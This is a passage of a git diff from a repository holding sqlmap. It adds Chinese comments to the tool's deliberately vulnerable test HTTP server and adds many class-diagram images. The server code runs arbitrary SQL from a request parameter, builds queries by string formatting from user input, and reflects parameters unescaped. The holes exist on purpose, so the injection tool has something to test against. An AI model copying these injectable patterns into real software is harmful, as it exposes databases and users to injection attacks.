+                params.update(json.loads(self.data))  # JSON 数据
             elif self.data.startswith('<') and self.data.endswith('>'):
-                params.update(dict((_[0], _[1].replace("&apos;", "'").replace("&quot;", '"').replace("&lt;", '<').replace("&gt;", '>').replace("&amp;", '&')) for _ in re.findall(r'name="([^"]+)" value="([^"]*)"', self.data)))
+                # 解析 HTML 表单数据
+                params.update(dict((_[0], _[1].replace("&apos;", "'").replace("&quot;", '"')
+                                    .replace("&lt;", '<').replace("&gt;", '>').replace("&amp;", '&'))
+                                   for _ in re.findall(r'name="([^"]+)" value="([^"]*)"', self.data)))
             else:
-                self.data = self.data.replace(';', '&')     # Note: seems that Python3 started ignoring parameter splitting with ';'
+                # 处理 URL 编码数据
+                self.data = self.data.replace(';', '&')  # 兼容性处理
                 params.update(parse_qs(self.data))
 
+        # 处理请求头参数
         for name in self.headers:
             params[name.lower()] = self.headers[name]
 
+        # 处理 Cookie 参数
         if "cookie" in params:
             for part in params["cookie"].split(';'):
                 part = part.strip()
@@ -125,14 +140,17 @@ class ReqHandler(BaseHTTPRequestHandler):
                     name, value = part.split('=', 1)
                     params[name.strip()] = unquote_plus(value.strip())
 
+        # 将多值参数转换为单值
         for key in params:
             if params[key] and isinstance(params[key], (tuple, list)):
                 params[key] = params[key][-1]
 
-        self.url, self.params = path, params
+        self.url, self.params = path, params  # 存储 URL 和参数
 
         if self.url == '/':
+            # 主页处理
             if not any(_ in self.params for _ in ("id", "query")):
+                # 如果没有 ID 或查询参数，则显示主页面
                 self.send_response(OK)
                 self.send_header("Content-type", "text/html; charset=%s" % UNICODE_ENCODING)
                 self.send_header("Connection", "close")
@@ -142,27 +160,33 @@ class ReqHandler(BaseHTTPRequestHandler):
                 code, output = OK, ""
 
                 try:
+                    # 处理回显参数
                     if self.params.get("echo", ""):
                         output += "%s<br>" % self.params["echo"]
 
                     if self.params.get("reflect", ""):
                         output += "%s<br>" % self.params.get("id")
 
-                    with _lock:
+                    with _lock:  # 使用锁来确保线程安全
                         if "query" in self.params:
+                            # 执行任意 SQL 查询
                             _cursor.execute(self.params["query"])
                         elif "id" in self.params:
+                            # 通过 ID 查询用户
                             if "base64" in self.params:
-                                _cursor.execute("SELECT * FROM users WHERE id=%s LIMIT 0, 1" % base64.b64decode("%s===" % self.params["id"], altchars=self.params.get("altchars")).decode())
+                                _cursor.execute("SELECT * FROM users WHERE id=%s LIMIT 0, 1" %
+                                                base64.b64decode("%s===" % self.params["id"],
+                                                altchars=self.params.get("altchars")).decode())
                             else:
                                 _cursor.execute("SELECT * FROM users WHERE id=%s LIMIT 0, 1" % self.params["id"])
-                        results = _cursor.fetchall()
+                        results = _cursor.fetchall()  # 获取查询结果
 
                     output += "<b>SQL results:</b><br>\n"
 
+                    # 根据查询结果决定响应的状态码和内容
                     if self.params.get("code", ""):
                         if not results:
-                            code = INTERNAL_SERVER_ERROR
+                            code = INTERNAL_SERVER_ERROR  # 出错
                     else:
                         if results:
                             output += "<table border=\"1\">\n"
@@ -175,15 +199,16 @@ class ReqHandler(BaseHTTPRequestHandler):
 
                             output += "</table>\n"
                         else:
-                            output += "no results found"
+                            output += "no results found"  # 查询无结果
 
                     output += "</body></html>"
                 except Exception as ex:
                     code = INTERNAL_SERVER_ERROR
+                    # 捕获异常并返回错误信息
                     output = "%s: %s" % (re.search(r"'([^']+)'", str(type(ex))).group(1), ex)
 
+                # 发送响应
                 self.send_response(code)
-
                 self.send_header("Content-type", "text/html")
                 self.send_header("Connection", "close")
 
@@ -194,26 +219,30 @@ class ReqHandler(BaseHTTPRequestHandler):
                     self.end_headers()
                     self.wfile.write(output if isinstance(output, bytes) else output.encode(UNICODE_ENCODING))
         else:
+            # 对于未定义的路径返回 404
             self.send_response(NOT_FOUND)
             self.send_header("Connection", "close")
             self.end_headers()
 
     def do_GET(self):
-        self.do_REQUEST()
+        self.do_REQUEST()  # 处理 GET 请求
 
     def do_PUT(self):
-        self.do_POST()
+        self.do_POST()  # 处理 PUT 请求
 
     def do_HEAD(self):
-        self.do_REQUEST()
+        self.do_REQUEST()  # 处理 HEAD 请求
 
     def do_POST(self):
+        # 处理 POST 请求
         length = int(self.headers.get("Content-length", 0))
         if length:
+            # 读取请求体数据
             data = self.rfile.read(length)
             data = unquote_plus(data.decode(UNICODE_ENCODING, "ignore"))
             self.data = data
         elif self.headers.get("Transfer-encoding") == "chunked":
+            # 处理 chunked 请求
             data, line = b"", b""
             count = 0
 
@@ -232,10 +261,10 @@ class ReqHandler(BaseHTTPRequestHandler):
 
             self.data = data.decode(UNICODE_ENCODING, "ignore")
 
-        self.do_REQUEST()
+        self.do_REQUEST()  # 处理 POST 逻辑
 
     def log_message(self, format, *args):
-        return
+        return  # 不记录日志
 
 def run(address=LISTEN_ADDRESS, port=LISTEN_PORT):
     global _alive
@@ -244,16 +273,17 @@ def run(address=LISTEN_ADDRESS, port=LISTEN_PORT):
         _alive = True
         _server = ThreadingServer((address, port), ReqHandler)
         print("[i] running HTTP server at 'http://%s:%d'" % (address, port))
-        _server.serve_forever()
+        _server.serve_forever()  # 开始监听并处理请求
     except KeyboardInterrupt:
-        _server.socket.close()
+        _server.socket.close()  # 关闭服务器
         raise
     finally:
         _alive = False
 
 if __name__ == "__main__":
     try:
-        init()
-        run(sys.argv[1] if len(sys.argv) > 1 else LISTEN_ADDRESS, int(sys.argv[2] if len(sys.argv) > 2 else LISTEN_PORT))
+        init()  # 初始化数据库和服务器
+        run(sys.argv[1] if len(sys.argv) > 1 else LISTEN_ADDRESS,
+            int(sys.argv[2] if len(sys.argv) > 2 else LISTEN_PORT))
     except KeyboardInterrupt:
-        print("\r[x] Ctrl-C received")
+        print("\r[x] Ctrl-C received")  # 捕获 Ctrl-C 终止信号
\ No newline at end of file
diff --git a/src/sqlmap-master/lib/class_diagram/blind_classes_blind.png b/src/sqlmap-master/lib/class_diagram/blind_classes_blind.png
new file mode 100644
index 0000000..bcaf83a
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/blind_classes_blind.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/blind_packages_blind.png b/src/sqlmap-master/lib/class_diagram/blind_packages_blind.png
new file mode 100644
index 0000000..11484b3
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/blind_packages_blind.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/controller_classes_controller.png b/src/sqlmap-master/lib/class_diagram/controller_classes_controller.png
new file mode 100644
index 0000000..bcaf83a
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/controller_classes_controller.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/controller_packages_controller.png b/src/sqlmap-master/lib/class_diagram/controller_packages_controller.png
new file mode 100644
index 0000000..e4ca890
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/controller_packages_controller.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/core_classes_core.png b/src/sqlmap-master/lib/class_diagram/core_classes_core.png
new file mode 100644
index 0000000..4e0f3a8
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/core_classes_core.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/core_packages_core.png b/src/sqlmap-master/lib/class_diagram/core_packages_core.png
new file mode 100644
index 0000000..03f35fa
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/core_packages_core.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/dns_classes_dns.png b/src/sqlmap-master/lib/class_diagram/dns_classes_dns.png
new file mode 100644
index 0000000..bcaf83a
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/dns_classes_dns.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/dns_packages_dns.png b/src/sqlmap-master/lib/class_diagram/dns_packages_dns.png
new file mode 100644
index 0000000..3c73804
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/dns_packages_dns.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/error_classes_error.png b/src/sqlmap-master/lib/class_diagram/error_classes_error.png
new file mode 100644
index 0000000..bcaf83a
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/error_classes_error.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/error_packages_error.png b/src/sqlmap-master/lib/class_diagram/error_packages_error.png
new file mode 100644
index 0000000..0c1eedf
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/error_packages_error.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/parse_classes_parse.png b/src/sqlmap-master/lib/class_diagram/parse_classes_parse.png
new file mode 100644
index 0000000..f0acca2
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/parse_classes_parse.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/parse_packages_parse.png b/src/sqlmap-master/lib/class_diagram/parse_packages_parse.png
new file mode 100644
index 0000000..18a478b
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/parse_packages_parse.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/request_classes_request.png b/src/sqlmap-master/lib/class_diagram/request_classes_request.png
new file mode 100644
index 0000000..aa6d21f
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/request_classes_request.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/request_packages_request.png b/src/sqlmap-master/lib/class_diagram/request_packages_request.png
new file mode 100644
index 0000000..319c7bc
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/request_packages_request.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/takeover_classes_takeover.png b/src/sqlmap-master/lib/class_diagram/takeover_classes_takeover.png
new file mode 100644
index 0000000..390cad8
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/takeover_classes_takeover.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/takeover_packages_takeover.png b/src/sqlmap-master/lib/class_diagram/takeover_packages_takeover.png
new file mode 100644
index 0000000..260706c
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/takeover_packages_takeover.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/techniques_classes_techniques.png b/src/sqlmap-master/lib/class_diagram/techniques_classes_techniques.png
new file mode 100644
index 0000000..bcaf83a
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/techniques_classes_techniques.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/techniques_packages_techniques.png b/src/sqlmap-master/lib/class_diagram/techniques_packages_techniques.png
new file mode 100644
index 0000000..3fb3d13
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/techniques_packages_techniques.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/union_classes_union.png b/src/sqlmap-master/lib/class_diagram/union_classes_union.png
new file mode 100644
index 0000000..bcaf83a
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/union_classes_union.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/union_packages_union.png b/src/sqlmap-master/lib/class_diagram/union_packages_union.png
new file mode 100644
index 0000000..6a34f3a
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/union_packages_union.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/utils_classes_utils.png b/src/sqlmap-master/lib/class_diagram/utils_classes_utils.png
new file mode 100644
index 0000000..66aec56
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/utils_classes_utils.png differ
diff --git a/src/sqlmap-master/lib/class_diagram/utils_packages_utils.png b/src/sqlmap-master/lib/class_diagram/utils_packages_utils.png
new file mode 100644
index 0000000..192aa84
Binary files /dev/null and b/src/sqlmap-master/lib/class_diagram/utils_packages_utils.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/access_classes_access.png b/src/sqlmap-master/plugins/dbms/class_diagram/access_classes_access.png
new file mode 100644
index 0000000..c8716f0
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/access_classes_access.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/access_packages_access.png b/src/sqlmap-master/plugins/dbms/class_diagram/access_packages_access.png
new file mode 100644
index 0000000..421495a
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/access_packages_access.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/altibase_classes_altibase.png b/src/sqlmap-master/plugins/dbms/class_diagram/altibase_classes_altibase.png
new file mode 100644
index 0000000..ceffc56
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/altibase_classes_altibase.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/altibase_packages_altibase.png b/src/sqlmap-master/plugins/dbms/class_diagram/altibase_packages_altibase.png
new file mode 100644
index 0000000..b11b497
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/altibase_packages_altibase.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/cache_classes_cache.png b/src/sqlmap-master/plugins/dbms/class_diagram/cache_classes_cache.png
new file mode 100644
index 0000000..b81383c
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/cache_classes_cache.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/cache_packages_cache.png b/src/sqlmap-master/plugins/dbms/class_diagram/cache_packages_cache.png
new file mode 100644
index 0000000..285d370
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/cache_packages_cache.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/clickhouse_classes_clickhouse.png b/src/sqlmap-master/plugins/dbms/class_diagram/clickhouse_classes_clickhouse.png
new file mode 100644
index 0000000..68d9343
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/clickhouse_classes_clickhouse.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/clickhouse_packages_clickhouse.png b/src/sqlmap-master/plugins/dbms/class_diagram/clickhouse_packages_clickhouse.png
new file mode 100644
index 0000000..b46b913
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/clickhouse_packages_clickhouse.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/cratedb_classes_cratedb.png b/src/sqlmap-master/plugins/dbms/class_diagram/cratedb_classes_cratedb.png
new file mode 100644
index 0000000..f54cc4d
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/cratedb_classes_cratedb.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/cratedb_packages_cratedb.png b/src/sqlmap-master/plugins/dbms/class_diagram/cratedb_packages_cratedb.png
new file mode 100644
index 0000000..1cd17d8
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/cratedb_packages_cratedb.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/cubrid_classes_cubrid.png b/src/sqlmap-master/plugins/dbms/class_diagram/cubrid_classes_cubrid.png
new file mode 100644
index 0000000..034e8eb
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/cubrid_classes_cubrid.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/cubrid_packages_cubrid.png b/src/sqlmap-master/plugins/dbms/class_diagram/cubrid_packages_cubrid.png
new file mode 100644
index 0000000..e0e064c
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/cubrid_packages_cubrid.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/db2_classes_db2.png b/src/sqlmap-master/plugins/dbms/class_diagram/db2_classes_db2.png
new file mode 100644
index 0000000..d11ff5a
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/db2_classes_db2.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/db2_packages_db2.png b/src/sqlmap-master/plugins/dbms/class_diagram/db2_packages_db2.png
new file mode 100644
index 0000000..336f656
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/db2_packages_db2.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/derby_classes_derby.png b/src/sqlmap-master/plugins/dbms/class_diagram/derby_classes_derby.png
new file mode 100644
index 0000000..a3b7350
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/derby_classes_derby.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/derby_packages_derby.png b/src/sqlmap-master/plugins/dbms/class_diagram/derby_packages_derby.png
new file mode 100644
index 0000000..e5e57a2
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/derby_packages_derby.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/extremedb_classes_extremedb.png b/src/sqlmap-master/plugins/dbms/class_diagram/extremedb_classes_extremedb.png
new file mode 100644
index 0000000..feda6ac
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/extremedb_classes_extremedb.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/extremedb_packages_extremedb.png b/src/sqlmap-master/plugins/dbms/class_diagram/extremedb_packages_extremedb.png
new file mode 100644
index 0000000..29a17f1
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/extremedb_packages_extremedb.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/firebird_classes_firebird.png b/src/sqlmap-master/plugins/dbms/class_diagram/firebird_classes_firebird.png
new file mode 100644
index 0000000..dfa47db
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/firebird_classes_firebird.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/firebird_packages_firebird.png b/src/sqlmap-master/plugins/dbms/class_diagram/firebird_packages_firebird.png
new file mode 100644
index 0000000..af96735
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/firebird_packages_firebird.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/frontbase_classes_frontbase.png b/src/sqlmap-master/plugins/dbms/class_diagram/frontbase_classes_frontbase.png
new file mode 100644
index 0000000..079b591
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/frontbase_classes_frontbase.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/frontbase_packages_frontbase.png b/src/sqlmap-master/plugins/dbms/class_diagram/frontbase_packages_frontbase.png
new file mode 100644
index 0000000..9c81518
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/frontbase_packages_frontbase.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/h2_classes_h2.png b/src/sqlmap-master/plugins/dbms/class_diagram/h2_classes_h2.png
new file mode 100644
index 0000000..496383d
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/h2_classes_h2.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/h2_packages_h2.png b/src/sqlmap-master/plugins/dbms/class_diagram/h2_packages_h2.png
new file mode 100644
index 0000000..7b977e8
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/h2_packages_h2.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/hsqldb_classes_hsqldb.png b/src/sqlmap-master/plugins/dbms/class_diagram/hsqldb_classes_hsqldb.png
new file mode 100644
index 0000000..2a3ffa0
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/hsqldb_classes_hsqldb.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/hsqldb_packages_hsqldb.png b/src/sqlmap-master/plugins/dbms/class_diagram/hsqldb_packages_hsqldb.png
new file mode 100644
index 0000000..89c66ce
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/hsqldb_packages_hsqldb.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/informix_classes_informix.png b/src/sqlmap-master/plugins/dbms/class_diagram/informix_classes_informix.png
new file mode 100644
index 0000000..cbc5977
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/informix_classes_informix.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/informix_packages_informix.png b/src/sqlmap-master/plugins/dbms/class_diagram/informix_packages_informix.png
new file mode 100644
index 0000000..0f46bc6
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/informix_packages_informix.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/maxdb_classes_maxdb.png b/src/sqlmap-master/plugins/dbms/class_diagram/maxdb_classes_maxdb.png
new file mode 100644
index 0000000..6d80090
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/maxdb_classes_maxdb.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/maxdb_packages_maxdb.png b/src/sqlmap-master/plugins/dbms/class_diagram/maxdb_packages_maxdb.png
new file mode 100644
index 0000000..89cc076
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/maxdb_packages_maxdb.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/mckoi_classes_mckoi.png b/src/sqlmap-master/plugins/dbms/class_diagram/mckoi_classes_mckoi.png
new file mode 100644
index 0000000..e7c65ed
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/mckoi_classes_mckoi.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/mckoi_packages_mckoi.png b/src/sqlmap-master/plugins/dbms/class_diagram/mckoi_packages_mckoi.png
new file mode 100644
index 0000000..b8c92f8
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/mckoi_packages_mckoi.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/mimersql_classes_mimersql.png b/src/sqlmap-master/plugins/dbms/class_diagram/mimersql_classes_mimersql.png
new file mode 100644
index 0000000..4d25a81
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/mimersql_classes_mimersql.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/mimersql_packages_mimersql.png b/src/sqlmap-master/plugins/dbms/class_diagram/mimersql_packages_mimersql.png
new file mode 100644
index 0000000..2f563ef
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/mimersql_packages_mimersql.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/monetdb_classes_monetdb.png b/src/sqlmap-master/plugins/dbms/class_diagram/monetdb_classes_monetdb.png
new file mode 100644
index 0000000..a5a7d8a
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/monetdb_classes_monetdb.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/monetdb_packages_monetdb.png b/src/sqlmap-master/plugins/dbms/class_diagram/monetdb_packages_monetdb.png
new file mode 100644
index 0000000..2ed9a4b
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/monetdb_packages_monetdb.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/mssqlserver_classes_mssqlserver.png b/src/sqlmap-master/plugins/dbms/class_diagram/mssqlserver_classes_mssqlserver.png
new file mode 100644
index 0000000..ddc61ac
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/mssqlserver_classes_mssqlserver.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/mssqlserver_packages_mssqlserver.png b/src/sqlmap-master/plugins/dbms/class_diagram/mssqlserver_packages_mssqlserver.png
new file mode 100644
index 0000000..ef94b07
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/mssqlserver_packages_mssqlserver.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/mysql_classes_mysql.png b/src/sqlmap-master/plugins/dbms/class_diagram/mysql_classes_mysql.png
new file mode 100644
index 0000000..9eaea2f
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/mysql_classes_mysql.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/mysql_packages_mysql.png b/src/sqlmap-master/plugins/dbms/class_diagram/mysql_packages_mysql.png
new file mode 100644
index 0000000..018e829
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/mysql_packages_mysql.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/oracle_classes_oracle.png b/src/sqlmap-master/plugins/dbms/class_diagram/oracle_classes_oracle.png
new file mode 100644
index 0000000..92bccd2
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/oracle_classes_oracle.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/oracle_packages_oracle.png b/src/sqlmap-master/plugins/dbms/class_diagram/oracle_packages_oracle.png
new file mode 100644
index 0000000..28489bd
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/oracle_packages_oracle.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/postgresql_classes_postgresql.png b/src/sqlmap-master/plugins/dbms/class_diagram/postgresql_classes_postgresql.png
new file mode 100644
index 0000000..a5ad53d
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/postgresql_classes_postgresql.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/postgresql_packages_postgresql.png b/src/sqlmap-master/plugins/dbms/class_diagram/postgresql_packages_postgresql.png
new file mode 100644
index 0000000..a92b34a
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/postgresql_packages_postgresql.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/presto_classes_presto.png b/src/sqlmap-master/plugins/dbms/class_diagram/presto_classes_presto.png
new file mode 100644
index 0000000..305d35e
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/presto_classes_presto.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/presto_packages_presto.png b/src/sqlmap-master/plugins/dbms/class_diagram/presto_packages_presto.png
new file mode 100644
index 0000000..f41e9b6
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/presto_packages_presto.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/raima_classes_raima.png b/src/sqlmap-master/plugins/dbms/class_diagram/raima_classes_raima.png
new file mode 100644
index 0000000..c69870a
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/raima_classes_raima.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/raima_packages_raima.png b/src/sqlmap-master/plugins/dbms/class_diagram/raima_packages_raima.png
new file mode 100644
index 0000000..0034ecd
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/raima_packages_raima.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/sqlite_classes_sqlite.png b/src/sqlmap-master/plugins/dbms/class_diagram/sqlite_classes_sqlite.png
new file mode 100644
index 0000000..1823aa4
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/sqlite_classes_sqlite.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/sqlite_packages_sqlite.png b/src/sqlmap-master/plugins/dbms/class_diagram/sqlite_packages_sqlite.png
new file mode 100644
index 0000000..54bb312
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/sqlite_packages_sqlite.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/sybase_classes_sybase.png b/src/sqlmap-master/plugins/dbms/class_diagram/sybase_classes_sybase.png
new file mode 100644
index 0000000..97471ba
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/sybase_classes_sybase.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/sybase_packages_sybase.png b/src/sqlmap-master/plugins/dbms/class_diagram/sybase_packages_sybase.png
new file mode 100644
index 0000000..043c8f8
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/sybase_packages_sybase.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/vertica_classes_vertica.png b/src/sqlmap-master/plugins/dbms/class_diagram/vertica_classes_vertica.png
new file mode 100644
index 0000000..40e2f28
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/vertica_classes_vertica.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/vertica_packages_vertica.png b/src/sqlmap-master/plugins/dbms/class_diagram/vertica_packages_vertica.png
new file mode 100644
index 0000000..fea71c3
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/vertica_packages_vertica.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/virtuoso_classes_virtuoso.png b/src/sqlmap-master/plugins/dbms/class_diagram/virtuoso_classes_virtuoso.png
new file mode 100644
index 0000000..0118466
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/virtuoso_classes_virtuoso.png differ
diff --git a/src/sqlmap-master/plugins/dbms/class_diagram/virtuoso_packages_virtuoso.png b/src/sqlmap-master/plugins/dbms/class_diagram/virtuoso_packages_virtuoso.png
new file mode 100644
index 0000000..39686ca
Binary files /dev/null and b/src/sqlmap-master/plugins/dbms/class_diagram/virtuoso_packages_virtuoso.png differ
diff --git a/src/sqlmap-master/plugins/generic/class_diagram/class_diagram_classes_class_diagram.png b/src/sqlmap-master/plugins/generic/class_diagram/class_diagram_classes_class_diagram.png
new file mode 100644
index 0000000..bcaf83a
Binary files /dev/null and b/src/sqlmap-master/plugins/generic/class_diagram/class_diagram_classes_class_diagram.png differ
diff --git a/src/sqlmap-master/plugins/generic/class_diagram/generic_classes_generic.png b/src/sqlmap-master/plugins/generic/class_diagram/generic_classes_generic.png
new file mode 100644
index 0000000..7994a60
Binary files /dev/null and b/src/sqlmap-master/plugins/generic/class_diagram/generic_classes_generic.png differ
diff --git a/src/sqlmap-master/plugins/generic/class_diagram/generic_packages_generic.png b/src/sqlmap-master/plugins/generic/class_diagram/generic_packages_generic.png
new file mode 100644
index 0000000..a37df7d
Binary files /dev/null and b/src/sqlmap-master/plugins/generic/class_diagram/generic_packages_generic.png differ
diff --git a/src/sqlmap-master/sqlmap.conf b/src/sqlmap-master/sqlmap.conf
index 5b1a102..a0ca217 100644
--- a/src/sqlmap-master/sqlmap.conf
+++ b/src/sqlmap-master/sqlmap.conf
@@ -1,900 +1,929 @@
-# At least one of these options has to be specified to set the source to
-# get target URLs from.
